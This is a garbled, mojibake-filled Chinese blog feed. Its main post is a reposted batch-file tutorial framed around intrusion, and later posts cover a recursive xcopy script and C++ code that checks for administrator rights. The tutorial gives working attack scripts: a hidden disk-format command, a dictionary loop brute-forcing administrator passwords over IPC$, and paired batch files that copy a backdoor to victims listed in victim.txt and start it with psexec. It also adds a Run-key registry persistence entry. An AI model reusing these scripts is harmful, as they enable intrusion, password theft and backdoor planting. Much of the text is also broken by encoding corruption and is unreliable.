俺对lp��_��奇怪居然没人去告这个公司，如此明目张胆的散播病毒，�q�有没有王法了�?/div>

lp�W�着��_��据说�q�个公司的老��d��xxx是亲戚呢�?/div>

俺大�(zh��n)�，原来如此�Q�同时对lp的消息如此灵通表�C�崇拜�?/div>

删除完该病毒后，俺庄严的在lp的配�|�文件C:\winnt\system32\drivers\etc\host后添�?

127.0.0.1 www.3721.com

希望世界从此清静�?..能吗?或许不能�Q�但误��我把�q�个恶心的名�U�永�q�钉在耻��i�׃��Q?/div>

3721之无��d��面教�?/font> �?/div>

具体自己看，俺来�ȝ��一下：

1�Q�对于在办公室上�|�的同志�Q�因�?721会把很多黄色�|�站攑֜�你的地址栏，有些按钮会把你引导到黄色�?sh��)媄�|�站(?)�Q�所以如果不��心极其影响声誉�Q?/div>

2�Q�对于想不断提高�?sh��)脑性能的发烧友�Q?721会严重媄响电(sh��)脑的性能。稍微负责�Q的程序是不会乱安装钩子和乱开�U�程的�?/div>

3�Q�对于电(sh��)脑配�|�比较差的，�?

4�Q�对于想“我的电(sh��)脑我做主”的�Q�就不用说了�Q�这�U�强奸民意的病毒杀之而后快�?/div>

brent 2005-12-19 09:26 发表评论

�~�写DOS批处理文件[转]

brent — Mon, 19 Dec 2005 00:52:00 GMT

原文地址http://www.xker.com/article/articleview/2005-2-6/article_view_523.htm

如果没有一定的相关知识恐怕不�Ҏ(gu��)��看懂和理解批处理文�g�Q�也��更谈不上自己动手编写了

批处理文件是无格式的文本文�g�Q�它包含一条或多条命��o。它的文件扩展名�?.bat �?.cmd。在命��o提示下键入批处理文�g的名�U�ͼ�或者双击该批处理文�Ӟ��pȝ��׃��调用Cmd.exe按照该文件中各个命��o出现的顺序来逐个�q�行它们。��用批处理文�g�Q�也被称为批处理�E�序或脚本）�Q�可以简化日常或重复性�Q务。当然我们的�q�个版本的主要内�Ҏ(gu��)��介绍批处理在入��R中一些实际运用，例如我们后面要提到的用批处理文�g来给�pȝ��打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧�?/p>

一.��单批处理内部命��o��?br />1.Echo 命��o
打开回显或关闭请求回昑֊�能，或显�C�消息。如果没有�Q何参敎ͼ�echo 命��o��显�C�当前回显设�|��?br />语法
echo [{ on|off }] [message]
Sample�Q�@echo off / echo hello world
在实际应用中我们会把�q�条命��o和重定向�W�号�Q�也�U�Cؓ��道�W�号�Q�一般用> >> ^�Q�结合来实现输入一些命令到特定格式的文件中.�q�将在以后的例子中体现出来�?/p>

2.@ 命��o
表示不显�C�@后面的命令，在入侵过�E�中�Q�例如��用批处理来格式化敌�h的硬盘）自然不能让对方看��C��使用的命令啦�?br />Sample�Q�@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format �q�个命��o是不可以使用/y�q�个参数的，可喜的是微��Y留了个autoset�q�个参数�l�我们，效果�?y是一��L(f��ng)��?

3.Goto 命��o
指定跌��{到标�{�，扑ֈ�标签后，�E�序��处理从下一行开始的命��o�?br />语法�Q�goto label �Q�label是参敎ͼ�指定所要�{向的批处理程序中的行。）
Sample�Q?br />if { %1 }=={ } goto noparms
if { %2 }=={ } goto noparms�Q�如果这里的if�?1�?2你不明白的话�Q�先跌��去，后面会有详细的解释。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便�v�Q�但是最好是有意义的字母啦，字母前加个：用来表示�q�个字母是标�{�，goto命��o��是�Ҏ(gu��)��q�个�Q�来��L��下一步蟩到到那里。最好有一些说明这样你别�h看�v来才会理解你的意囑֕��?/p>

4.Rem 命��o
注释命��o�Q�在C语言中相当与/*--------*/,它�ƈ不会被执行，只是起一个注释的作用�Q�便于别人阅��d��你自己日后修攏V�?br />Rem Message
Sample�Q�@Rem Here is the description.

5.Pause 命��o
�q�行 Pause 命��o�Ӟ��显�C�Z��面的消息�Q?br />Press any key to continue . . .
Sample�Q?br />@echo off
:begin
copy a:*.* d�Q?/back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中�Q�驱动器 A 中磁盘上的所有文件均复制到d://back中。显�C�的注释提示�(zh��n)�将另一张磁盘放入驱动器 A �Ӟ��pause 命��o会�ɽE�序挂�v�Q�以便�?zh��n)�更换��盘�Q�然后按��L��键��l�处理�?/p>

6.Call 命��o
从一个批处理�E�序调用另一个批处理�E�序�Q��ƈ且不�l�止父批处理�E�序。call 命��o接受用作调用目标的标�{�。如果在脚本或批处理文�g外��?Call�Q�它?y��u)��不会在命��o行�v作用�?br />语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive: }[Path] FileName
指定要调用的批处理程序的位置和名�U�。filename 参数必须��h�� .bat �?.cmd 扩展名�?/p>

7.start 命��o
调用外部�E�序�Q�所有的DOS命��o和命令行�E�序都可以由start命��o来调用�?br />入��R常用参数�Q?br />MIN 开始时�H�口最��化
SEPARATE 在分开的空间内开�?16 �?Windows �E�序
HIGH �?HIGH 优先�U�类别开始应用程�?br />REALTIME �?REALTIME 优先�U�类别开始应用程�?br />WAIT 启动应用�E�序�q�等候它�l�束
parameters �q�些��Z��送到命��o/�E�序的参�?br />执行的应用程序是 32-�?GUI 应用�E�序�Ӟ��CMD.EXE 不等应用�E�序�l�止��p��回命令提�C�。如果在命��o脚本内执行，该新行�ؓ则不会发生�?br />8.choice 命��o
choice 使用此命令可以让用户输入一个字�W�，从而运行不同的命��o。��用时应该�?c:参数�Q�c:后应写提�C�可输入的字�W�，之间无空根{��它的返回码�?234…�?br />�? choice /c:dme defrag,mem,end
��显�C?br />defrag,mem,end[D,M,E]?
Sample�Q?br />Sample.bat的内容如�?
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag �Q�应先判断数值最高的错误码）
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c://dos//defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后�Q�将昄�� defrag,mem,end[D,M,E]? 用户可选择d m e �Q�然后if语句��作出判断，d表示执行标号为defrag的程序段�Q�m表示执行标号为mem的程序段�Q�e表示执行标号为end的程序段�Q�每个程序段最后都以goto end��程序蟩到end标号处，然后�E�序��显�C�good bye�Q�文件结束�?/p>

9.If 命��o

if 表示��判断是否符合规定的条�g�Q�从而决定执行不同的命��o�?有三�U�格�?
1、if "参数" == "字符�? 　待执行的命��o
参数如果�{�于指定的字�W�串�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?注意是两个等��P��
如if "%1"=="a" format a:
if { %1 }=={ } goto noparms
if { %2 }=={ } goto noparms

2、if exist 文�g名　待执行的命��o
如果有指定的文�g�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?br />如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 数字　待执行的命��o
如果�q�回码等于指定的数字�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?br />如if errorlevel 2 goto x2 　
DOS�E�序�q�行旉��会返回一个数字给DOS�Q�称为错误码errorlevel或称�q�回码，常见的返回码�?�?�?/p>

10.for 命��o
for 命��o是一个比较复杂的命��o�Q�主要用于参数在指定的范围内循环执行命��o�?br />在批处理文�g中��?FOR 命��o�Ӟ��指定变量请��?%%variable

for { %variable|%%variable } in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数�?br />(set) 指定一个或一�l�文件。可以��用通配�W��?br />command 指定�Ҏ(gu��)��个文件执行的命��o�?br />command-parameters 为特定命令指定参数或命��o行开兟�?br />在批处理文�g中��?FOR 命��o�Ӟ��指定变量请��?%%variable
而不要用 %variable。变量名�U�是区分大小写的�Q�所�?%i 不同�?%I

如果命��o扩展名被启用�Q�下列额外的 FOR 命��o格式会受�?br />支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配�W�，则指定与目录名匹配，而不与文�?br />名匹配�?/p>

FOR /R [[drive:]path] %variable IN (set) DO command [command-

��查以 [drive:]path 为根的目录树�Q�指向每个目录中�?br />FOR 语句。如果在 /R 后没有指定目录，则��用当�?br />目录。如果集仅�ؓ一个单�?.)字符�Q�则枚�D该目录树�?/p>

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量�Ş式从开始到�l�束的一个数字序列�?br />因此�Q?1,1,5) ��生序�?1 2 3 4 5�Q?5,-1,1) ��?br />序列 (5 4 3 2 1)�?/p>

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (/'command/') DO command

或者，如果�?usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (/'command/') DO command

filenameset ��Z��个或多个文�g名。��l�到 filenameset 中的
下一个文件之前，每䆾文�g都已被打开、读取�ƈ�l�过处理�?br />处理包括��d��文�g�Q�将其分成一行行的文字，然后��每�?br />解析成零或更多的�W�号。然后用已找到的�W�号字符串变量�?br />调用 For 循环。以默认方式�Q?F 通过每个文�g的每一行中分开
的第一个空白符受��蟩�q�空白行。�?zh��n)�可通过指定可�?"options"
参数替代默认解析操作。这个带引号的字�W�串包括一个或多个
指定不同解析选项的关键字。这些关键字�?

eol=c - 指一个行注释字符的结��?��׃��?
skip=n - 指在文�g开始时忽略的行数�?br />delims=xxx - 指分隔符集。这个替换了�I�格和蟩格键�?br />默认分隔�W�集�?br />tokens=x,y,m-n - 指每行的哪一个符可��传递到每个�q�代
�?for 本��n。这会导致额外变量名�U�的
格式��Z��个范围。通过 nth �W�号指定 m
�W�号字符串中的最后一个字�W�星��P��
那么额外的变量将在最后一个符可��析之
分配�q�接受行的保留文本�?br />usebackq - 指定新语法已在下�c�L��况中使用:
在作为命令执行一个后引号的字�W�串�q�且
引号字符为文字字�W�串命��o�q�允许在 fi
中��用双引号扩�v文�g名称�?/p>

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分�?myfile.txt 中的每一行，忽略以分��h��头的那些行，��?br />每行中的�W�二个和�W�三个符号传递给 for �E�序体；用逗号�?�?br />�I�格定界�W�号。请注意�Q�这�?for �E�序体的语句引用 %i �?br />取得�W�二个符��P��引用 %j 来取得第三个�W�号�Q�引�?%k
来取得第三个�W�号后的所有剩余符受��对于带有空格的文�g
名，�(zh��n)�需要用双引号将文�g名括��h��。�ؓ了用�q�种方式来��
用双引号�Q��?zh��n)��q�需要��?usebackq 选项�Q�否则，双引号会
被理解成是用作定义某个要分析的字�W�串的�?/p>

%i 专门�?for 语句中得到说明，%j �?%k 是通过
tokens= 选项专门得到说明的。�?zh��n)�可以通过 tokens= 一�?br />指定最�?26 个符��P��只要不试图说明一个高于字�?/'z/' �?br />/'Z/' 的变量。请��C��Q�FOR 变量是单一字母、分大小写和全局的；
同时不能�?52 个以上都在��用中�?/p>

�(zh��n)�还可以在相��d��W�串上��?FOR /F 分析逻辑�Q�方法是�Q?br />用单引号��括号之间的 filenameset 括�v来。这��P��该字�W?br />串会被当作一个文件中的一个单一输入行�?/p>

最后，�(zh��n)�可以用 FOR /F 命��o来分析命令的输出。方法是�Q�将
括号之间�?filenameset 变成一个反括字�W�串。该字符串会
被当作命令行�Q�传递到一个子 CMD.EXE�Q�其输出会被抓进
内存�Q��ƈ被当作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚丑ֽ�前环境中的环境变量名�U��?/p>

另外�Q�FOR 变量参照的替换已被增强。�?zh��n)�现在可以使用下�?br />选项语法:

~I - 删除��M��引号(")�Q�扩�?%I
%~fI - ��?%I 扩充��C��个完全合格的路径�?br />%~dI - 仅将 %I 扩充��C��个驱动器�?br />%~pI - 仅将 %I 扩充��C��个�\�?br />%~nI - 仅将 %I 扩充��C��个文件名
%~xI - 仅将 %I 扩充��C��个文件扩展名
%~sI - 扩充的�\径只含有短名
%~aI - ��?%I 扩充到文件的文�g属�?br />%~tI - ��?%I 扩充到文件的日期/旉��
%~zI - ��?%I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录，�q�将 %I 扩充
到找到的�W�一个完全合格的名称。如果环境变�?br />未被定义�Q�或者没有找到文�Ӟ��此组合键会扩�?br />�I�字�W�串

可以�l�合修饰�W�来得到多重�l�果:

%~dpI - 仅将 %I 扩充��C��个驱动器号和路径
%~nxI - 仅将 %I 扩充��C��个文件名和扩展名
%~fsI - 仅将 %I 扩充��C��个带有短名的完整路径�?br />%~dp$PATH:i - 查找列在路径环境变量的目录，�q�将 %I 扩充
到找到的�W�一个驱动器号和路径�?br />%~ftzaI - ��?%I 扩充到类��D��出线路的 DIR

在以上例子中�Q?I �?PATH 可用其他有效数��g��ѝ�?~ 语法
用一个有效的 FOR 变量名终止。选取�c�M�� %I 的大写变量名
比较易读�Q�而且避免与不分大��写的组合键��h��?/p>

以上是MS的官方帮助，下面我们丑և�个例子来具体说明一下For命��o在入侵中的用途�?/p>

sample2�Q?/p>

利用For命��o来实现对一台目标Win2k��L��的暴力密码破解�?br />我们用net use ////ip//ipc$ "password" /u:"administrator"来尝试这和目标主��行连接，当成功时��C��密码�?br />最主要的命令是一条：for /f i% in (dict.txt) do net use ////ip//ipc$ "i%" /u:"administrator"
用i%来表�C�admin的密码，在dict.txt中这个取i%的值用net use 命��o来连接。然后将�E�序�q�行�l�果传递给find命��o�Q�－
for /f i%% in (dict.txt) do net use ////ip//ipc$ "i%%" /u:"administrator"|find ":命��o成功完成">>D://ok.txt �Q�这样就ko了�?/p>

sample3�Q?/p>

你有没有�q�手里有大量肉鸡�{�着你去�U�后门＋木马呢？�Q�当数量特别多的时候，原本很开心的一件事都会变得很郁��P��Q�。文章开头就谈到使用批处理文�Ӟ��可以��化日常或重复性�Q务。那么如何实现呢�Q�呵呵，看下��M��׃��明白了�?/p>

主要命��o也只有一条：�Q�在批处理文件中使用 FOR 命��o�Ӟ��指定变量使用 %%variable�Q?br />@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1�Q�在�q�里它表�C�按��序��victim.txt中的内容传递给door.bat中的参数%i %j %k�?br />而cultivate.bat无非��是用net use命��o来徏立IPC$�q�接�Q��ƈcopy木马�Q�后门到victim�Q�然后用�q�回码（If errorlever =�Q�来�{�选成功种植后门的��L��Q��ƈecho出来�Q�或者echo到指定的文�g�?br />delims= 表示vivtim.txt中的内容是一�I�格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根�?%i %%j %%k表示的对象来排列�Q�一般就�?ip password username�?br />代码雏�Ş�Q?br />--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use ////%1//ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe////%1//admin$//system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec ////%1 c://winnt//system32//windrv32.exe
@psexec ////%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
�q�只是一个自动种植后门批处理的雏形，两个批处理和后门�E�序�Q�Windrv32.exe�Q?PSexec.exe需攑֜��l�一目录�?批处理内�?br />��可扩展,例如:加入清除日志+DDOS的功�?加入定时��d��用户的功�?更深入一点可以��之具备自动传播功�?蠕虫).此处不多做叙�q?有兴��的朋友可自行研�I?

�?如何在批处理文�g中��用参�?br />批处理中可以使用参数�Q�一般从1%�?9%�q�九(ji��)个，当有多个参数旉��要用shift来移动，�q�种情况�q�不多见�Q�我们就不考虑它了�?br />sample1�Q�fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
�q�个例子用于�q�箋地格式化几张软盘�Q�所以用的时候需在dos�H�口输入fomat.bat a�Q�呵�?好像有点画蛇添��了～^_^
sample2�Q?br />当我们要建立一个IPC$�q�接地时候总要输入一大串命��o�Q�弄不好��打错了�Q�所以我们不如把一些固定命令写入一个批处理�Q�把肉鸡地ip password username 当着参数来赋�l�这个批处理�Q�这样就不用每次都打命��o了�?br />@echo off
@net use ////1%//ipc$ "2%" /u:"3%" 注意哦，�q�里PASSWORD是第二个参数�?br />@if errorlevel 1 echo connection failed
怎么�?使用参数�q�是比较��单的吧？你这么帅一定学会了^_^.No.3
�?如何使用�l�合命��o(Compound Command)

1.&

Usage�Q�第一条命�?& �W�二条命�?[& �W�三条命�?..]

用这�U�方法可以同时执行多条命令，而不��命令是否执行成�?/p>

Sample�Q?br />C://>dir z: & dir c://Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c://Ex4rch

2002-05-14 23:51

.
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif

2.&&

Usage�Q�第一条命�?&& �W�二条命�?[&& �W�三条命�?..]

用这�U�方法可以同时执行多条命令，当碰到执行出错的命��o后将不执行后面的命��o�Q�如果一直没有出错则一直执行完所有命令；

Sample�Q?br />C://>dir z: && dir c://Ex4rch
The system cannot find the path specified.

C://>dir c://Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c://Ex4rch

2002-05-14 23:55

.
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

在做备䆾的时候可能会用到�q�种命��o会比较简单，如：
dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E://backup
如果�q�程服务器上存在backup.mdb文�g�Q�就执行copy命��o�Q�若不存在该文�g则不执行copy命��o。这�U�用法可以替换IF exist�?�Q�）

3.||

Usage�Q�第一条命�?|| �W�二条命�?[|| �W�三条命�?..]

用这�U�方法可以同时执行多条命令，当碰到执行正��的命��o后将不执行后面的命��o�Q�如果没有出现正��的命��o则一直执行完所有命令；

Sample�Q?br />C://Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C://Ex4rch

2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

�l�合命��o使用的例子：
sample�Q?br />@copy trojan.exe ////%1//admin$//system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt

四、管道命令的使用

1.| 命��o
Usage�Q�第一条命�?| �W�二条命�?[| �W�三条命�?..]
��第一条命令的�l�果作�ؓ�W�二条命令的参数来��用，记得在unix中这�U�方式很常见�?/p>

sample�Q?br />time /t>>D://IP.log
netstat -n -p tcp|find ":3389">>D://IP.log
start Explorer
看出来了么？用于�l�端服务允许我们为用戯��定义起始的程序，来实现让用户�q�行下面�q�个bat�Q�以获得��d��用户的IP�?/p>

2.>�?gt;>输出重定向命�?br />��一条命令或某个�E�序输出�l�果的重定向到特定文件中, > �?>>的区别在于，>会清除调原有文�g中的内容后写入指定文�Ӟ��?gt;>只会�q�加内容到指定文件中�Q�而不会改动其中的内容�?/p>

sample1�Q?br />echo hello world>c://hello.txt (stupid example?)

sample2:
时下DLL木马盛行�Q�我们知道system32是个捉迷藏的好地方，许多木马都削��了脑袋往那里钻，DLL马也不例外，针对�q�一�Ҏ(gu��)��们可以在安装好系�l�和必要的应用程序后�Q�对该目录下的EXE和DLL文�g作一个记录：
�q�行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
�q�样所有的EXE和DLL文�g的名�U�都被分别记录到exeback.txt和dllback.txt�?
日后如发现异�怽�用传�l�的�Ҏ(gu��)��查不出问题时,则要考虑是不是系�l�中已经潜入DLL木马�?
�q�时我们用同��L(f��ng)��命��o��system32下的EXE和DLL文�g记录到另外的exeback1.txt和dllback1.txt�?然后�q�行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命��o比较前后两次的DLL和EXE文�g,�q�将�l�果输入到diff.txt�?,�q�样我们��p��发现一些多出来的DLL和EXE文�g,然后通过查看创徏旉��、版本、是否经�q�压�~�等��p��够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DEL掉，先用regsvr32 /u trojan.dll��后门DLL文�g注销�?再把它移到回收站里，若系�l�没有异常反映再��之��d��删除或者提交给杀毒��Y件公司�?/p>

3.< �?gt;& �?lt;&
< 从文件中而不是从键盘中读入命令输入�?br />>& ��一个句柄的输出写入到另一个句柄的输入中�?br /><& 从一个句柄读取输入�ƈ��其写入到另一个句柄输��Z��?br />�q�些�q�不常用�Q�也��׃��多做介绍�?/p>

No.5
�?如何用批处理文�g来操作注册表

在入侵过�E�中�l�常回操作注册表的特定的键值来实现一定的目的�Q�例�?��Z��辑ֈ�隐藏后门、木马程序而删除Run下残余的键倹{��或者创��Z��个服务用以加载后门。当然我们也会修�Ҏ(gu��)��册表来加固系�l�或者改变系�l�的某个属性，�q�些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何��?REG文�g来操作注册表.(我们可以用批处理来生成一个REG文�g)
关于注册表的操作�Q�常见的是创建、修攏V��删除�?/p>

1.创徏
创徏分�ؓ两种�Q�一�U�是创徏子项(Subkey)

我们创徏一个文�Ӟ��内容如下�Q?/p>

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//hacker]

然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft下创��Z��一个名字�ؓ“hacker”的子项�?/p>

另一�U�是创徏一个项目名�U?br />那这�U�文件格式就是典型的文�g格式�Q�和你从注册表中导出的文件格式一��_��内容如下�Q?/p>

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]
"Invader"="Ex4rch"
"Door"=C:////WINNT////system32////door.exe
"Autodos"=dword:02

�q�样��在[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]�?br />新徏�?Invader、door、about�q�三个项�?br />Invader的类型是“String Value�?br />door的类型是“REG SZ Value�?br />Autodos的类型是“DWORD Value�?/p>

2.修改
修改相对来说比较��单，只要把你需要修改的��目导出�Q�然后用��C��本进行修改，然后导入�Q�regedit /s�Q�即可�?/p>

3.删除
我们首先来说说删除一个项目名�U�ͼ�我们创徏一个如下的文�g�Q?/p>

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]
"Ex4rch"=-

执行该脚本，[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]下的"Ex4rch"��p��删除了；

--------------------------------------------------------------------------------

以上��{载内�?/p>

%CD% 当前路径current directory
ITH305 http://www.cs.ntu.edu.au/homepages/bea/home/subjects/ith305/ith305.html

批处理copy特定名称目录的内容：

shark的模块有二十六个�Q�源文�g分散在各个文件夹(如下)。用eclipse阅读的话要一个个把src文�g的内容导入到��目中。在家摆弄的时候�ȝ��惛_��个方法来自动copy�q�些文�g�?人家分类分得好好的，我把他们合�ƈ在一��P��q�是搞破坏哈)

文�g目录形式:
shark-1.1
    modules
        SharkAPI
            src
        SharkApplicationMapPersistence
            DODS
                src
            Hibernate
                src
    ...

cpysrc.dat

@echo off
if "X%1"=="X" goto initialize
goto becalled
:initialize
if exist subdirs.txt del subdirs.txt>nul
dir /d /b /a:d> subdirs.txt
for /f %%i in (subdirs.txt ) do call E:\Resource\shark-1.1\modules\cpysrc.bat %%i
del subdirs.txt>nul
goto end
:becalled
if "%1"=="src" xcopy src\*.* E:\JavaApp\Shark\src\ /s && goto end
cd %1
call E:\Resource\shark-1.1\modules\cpysrc.bat
cd ..
:end

在cpysrc.bat保存到E:\Resource\shark-1.1\modules\下�ƈ执行��可以。cpysrc.bat��遍历当前目录下的所有目录，�q�copy名�ؓsrc文�g夹下的所有内容到E:\JavaApp\Shark\src\�?/p>

brent 2005-12-19 08:52 发表评论

brent — Mon, 25 Jul 2005 01:11:00 GMT

OK, Thanks to Loaden found out that my original code to determine whether an user is in Administrators group is totally bullshit.

And after googling for a while, I found something and test it, simply works. I will just paste the code here. Thanks to the author and google and God.

http://www.mihai-nita.net/article.php?artID=20070413a

// IsAdminAPI.cpp : Tests if user is Administrator using plain Win32 API
// Copyright (c) April 2007, Mihai Nita
//

#include <wtypes.h>
#include <Lm.h>

// for ASSERT
#include <crtdbg.h>

#include "IsAdminAPI.h"

bool IsAdminAPI( WCHAR const *szUserName )
{
    _ASSERT(szUserName);

    bool bAdmin = FALSE;
    LOCALGROUP_USERS_INFO_0* localGroups;
    DWORD entriesread, totalentries;
    NET_API_STATUS nts = NetUserGetLocalGroups( NULL, szUserName, 0, 0, (unsigned char**)&localGroups, MAX_PREFERRED_LENGTH, &entriesread, &totalentries);

    if( nts != NERR_Success ) {
        NetApiBufferFree(localGroups);
        return FALSE;
    }

    // Retrieve the Administrators group well-known SID

    // For some reason CreateWellKnownSid generates error C3861 on Developer Studio .NET:
    // error C3861: 'CreateWellKnownSid': identifier not found, even with argument-dependent lookup
    BYTE    SidAuth[] = SECURITY_NT_AUTHORITY;
    PSID    pAdminSid;
    AllocateAndInitializeSid( (PSID_IDENTIFIER_AUTHORITY)SidAuth,
        2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,
        NULL, NULL, NULL, NULL, NULL, NULL, &pAdminSid );

    // Will use this to retrieve the SID of the group
    BYTE    buffSid[SECURITY_MAX_SID_SIZE];
    wchar_t    buffDomain[DNLEN+1];
    DWORD    dwSidSize;
    DWORD    dwDomainSize;
    SID_NAME_USE m_sidnameuse;

    for( DWORD i = 0; i < entriesread; ++i ) {
        dwSidSize = sizeof(buffSid);
        dwDomainSize = DNLEN;

        // Although in general is a bad idea to call directly the W or A versions of API
        // we do it here to avoid converting the localGroups[i].lgrui0_name back to ANSI
        // This kind of security API is only present on NT/2000/XP family only, so
        // the W version is present and safe to use
        if( LookupAccountNameW( NULL, localGroups[i].lgrui0_name, buffSid, &dwSidSize, (LPWSTR)buffDomain, &dwDomainSize, &m_sidnameuse) ) // no sid for the actual group
            if( EqualSid( buffSid, pAdminSid ) ) {
                bAdmin = TRUE;
                break;
            }
    }
    FreeSid( pAdminSid );
    NetApiBufferFree(localGroups);

    return bAdmin;
}

注意有时我们只需要判断当前process是否以管理员权限�q�行。貌似可以通过调用GetTokenInformation 和AllocateAndInitializeSid 来判断，

google "Searching for a SID in an Access Token in C++" site:msdn.microsoft.com可找��C��D�代�? 误��行研�I�自行测试�?br>

#define MAX_NAME 256

BOOL SearchTokenGroupsForSID (VOID)
{
DWORD i, dwSize = 0, dwResult = 0;
HANDLE hToken;
PTOKEN_GROUPS pGroupInfo;
SID_NAME_USE SidType;
char lpName[MAX_NAME];
char lpDomain[MAX_NAME];
BYTE sidBuffer[100];
PSID pSID = (PSID)&sidBuffer;
SID_IDENTIFIER_AUTHORITY SIDAuth = SECURITY_NT_AUTHORITY;

// Open a handle to the access token for the calling process.

if (!OpenProcessToken( GetCurrentProcess(), TOKEN_QUERY, &hToken )) {
    printf( "OpenProcessToken Error %u\n", GetLastError() );
    return FALSE;
}

// Call GetTokenInformation to get the buffer size.

if(!GetTokenInformation(hToken, TokenGroups, NULL, dwSize, &dwSize)) {
    dwResult = GetLastError();
    if( dwResult != ERROR_INSUFFICIENT_BUFFER ) {
        printf( "GetTokenInformation Error %u\n", dwResult );
        return FALSE;
    }
}

// Allocate the buffer.

pGroupInfo = (PTOKEN_GROUPS) GlobalAlloc( GPTR, dwSize );

// Call GetTokenInformation again to get the group information.

if(! GetTokenInformation(hToken, TokenGroups, pGroupInfo,
                        dwSize, &dwSize ) ) {
    printf( "GetTokenInformation Error %u\n", GetLastError() );
    return FALSE;
   }

// Create a SID for the BUILTIN\Administrators group.

if(! AllocateAndInitializeSid( &SIDAuth, 2,
                 SECURITY_BUILTIN_DOMAIN_RID,
                 DOMAIN_ALIAS_RID_ADMINS,
                 0, 0, 0, 0, 0, 0,
                 &pSID) ) {
    printf( "AllocateAndInitializeSid Error %u\n", GetLastError() );
    return FALSE;
   }

// Loop through the group SIDs looking for the administrator SID.

for(i=0; i<pGroupInfo->GroupCount; i++) {
    if ( EqualSid(pSID, pGroupInfo->Groups[i].Sid) ) {

        // Lookup the account name and print it.

        dwSize = MAX_NAME;
        if( !LookupAccountSid( NULL, pGroupInfo->Groups[i].Sid,
                              lpName, &dwSize, lpDomain,
                              &dwSize, &SidType ) ) {
            dwResult = GetLastError();
            if( dwResult == ERROR_NONE_MAPPED )
               strcpy_s (lpName, dwSize, "NONE_MAPPED" );
            else {
                printf("LookupAccountSid Error %u\n", GetLastError());
                return FALSE;
            }
        }
        printf( "Current user is a member of the %s\\%s group\n",
                lpDomain, lpName );

        // Find out whether the SID is enabled in the token.
        if (pGroupInfo->Groups[i].Attributes & SE_GROUP_ENABLED)
            printf("The group SID is enabled.\n");
         else if (pGroupInfo->Groups[i].Attributes &
                          SE_GROUP_USE_FOR_DENY_ONLY)
            printf("The group SID is a deny-only SID.\n");
         else
            printf("The group SID is not enabled.\n");
    }
}

if (pSID)
    FreeSid(pSID);
if ( pGroupInfo )
    GlobalFree( pGroupInfo );
return TRUE;
}

向曾被我误导的同志表�C�真挚的道歉和沉痛的�(zh��n)�念�?br>
NSIS下判断当前用��h��否管理员�Q?br>http://nsis.sourceforge.net/Check_if_the_current_user_is_an_Administrator

